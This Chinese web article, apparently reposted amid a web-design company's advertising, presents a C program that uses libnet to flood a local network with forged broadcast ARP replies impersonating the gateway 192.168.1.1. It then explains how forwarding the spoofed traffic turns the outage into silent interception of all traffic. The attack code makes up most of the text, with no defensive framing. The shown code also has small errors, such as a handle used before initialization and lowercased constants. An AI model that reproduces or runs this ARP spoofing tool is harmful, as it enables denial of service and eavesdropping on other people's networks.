本文小編為大家詳細介紹“Linux怎么使用libnet實現(xiàn)ARP攻擊腳本”,內(nèi)容詳細,步驟清晰,細節(jié)處理妥當,希望這篇“Linux怎么使用libnet實現(xiàn)ARP攻擊腳本”文章能幫助大家解決疑惑,下面跟著小編的思路慢慢深入,一起來學習新知識吧。
十載的武威網(wǎng)站建設經(jīng)驗,針對設計、前端、開發(fā)、售后、文案、推廣等六對一服務,響應快,48小時及時工作處理。網(wǎng)絡營銷推廣的優(yōu)勢是能夠根據(jù)用戶設備顯示端的尺寸不同,自動調(diào)整武威建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設計,從而大程度地提升瀏覽體驗。成都創(chuàng)新互聯(lián)從事“武威網(wǎng)站設計”,“武威網(wǎng)站推廣”以來,每個客戶項目都認真落實執(zhí)行。代碼如下:
#include "arp.h"
int main(int argc,char **argv){
libnet_t *l;
int i,packet_size; //發(fā)送的數(shù)據(jù)包的長度
libnet_ptag_t arp_tag,ether_tag;
char *device="eth0";
char err_buf[libnet_errbuf_size];
char *destion_ip_str = "255.255.255.255";
char *source_ip_str = "192.168.1.1";
u_char source_hardware[6]={0x00,0x0c,0x29,0x68,0x95,0x84};
u_char destion_hardware[6]={0xff,0xff,0xff,0xff,0xff,0xff};
u_int32_t source_ip,destion_ip;
//將字符形式ip轉(zhuǎn)換為網(wǎng)絡字節(jié)序
source_ip = libnet_name2addr4(l,source_ip_str,libnet_resolve);
destion_ip = libnet_name2addr4(l,destion_ip_str,libnet_resolve);
//初始化libnet句柄
l = libnet_init(libnet_link,device,err_buf);
if(l == null){
printf("初始化libnet句柄失敗:%s\n",err_buf);
exit(-1);
}
arp_tag = libnet_build_arp(
arphrd_ether, //硬件地址類型,此處為以太網(wǎng)類型
ethertype_ip, //協(xié)議地址類型
6,
4,
arpop_reply, //arp應答
source_hardware,
(u_int8_t *)&source_ip,
destion_hardware,
(u_int8_t *)&destion_ip,
null, //無負載
0, //負載長度為0
l,
0 //協(xié)議塊標記,為0,表示新建協(xié)議塊
);
ether_tag = libnet_build_ethernet(
(u_int8_t *)&destion_hardware,
(u_int8_t *)&source_hardware,
ethertype_arp,
null,
0,
l,
0
);
i = 0;
while(1){
packet_size = libnet_write(l); //發(fā)送構(gòu)造的arp數(shù)據(jù)包
usleep(10);
i++;
}
printf("數(shù)據(jù)包長度為:%d\n",packet_size);
libnet_destroy(l);
return 0;
}
目標mac為廣播地址,全0xff就行,源mac地址可以為本機mac或者隨便偽造的mac(在程序中獲取本機mac可用ioctl函數(shù),最近在寫ddos攻擊程序就是用ioctl獲取本機mac和ip的),注意arp包類型為arpop_reply(應答包)。
如果不想弄斷網(wǎng),只進行欺騙的話,數(shù)據(jù)發(fā)送過來之后,要進行轉(zhuǎn)發(fā)到正確的網(wǎng)關,這樣就保證內(nèi)網(wǎng)網(wǎng)絡正常,而且所有數(shù)據(jù)都被監(jiān)聽了
讀到這里,這篇“Linux怎么使用libnet實現(xiàn)ARP攻擊腳本”文章已經(jīng)介紹完畢,想要掌握這篇文章的知識點還需要大家自己動手實踐使用過才能領會,如果想了解更多相關內(nèi)容的文章,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
標題名稱:Linux怎么使用libnet實現(xiàn)ARP攻擊腳本-創(chuàng)新互聯(lián)
URL分享:http://muchs.cn/article48/dspchp.html
成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供Google、網(wǎng)站制作、定制網(wǎng)站、關鍵詞優(yōu)化、網(wǎng)站內(nèi)鏈、網(wǎng)站維護
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容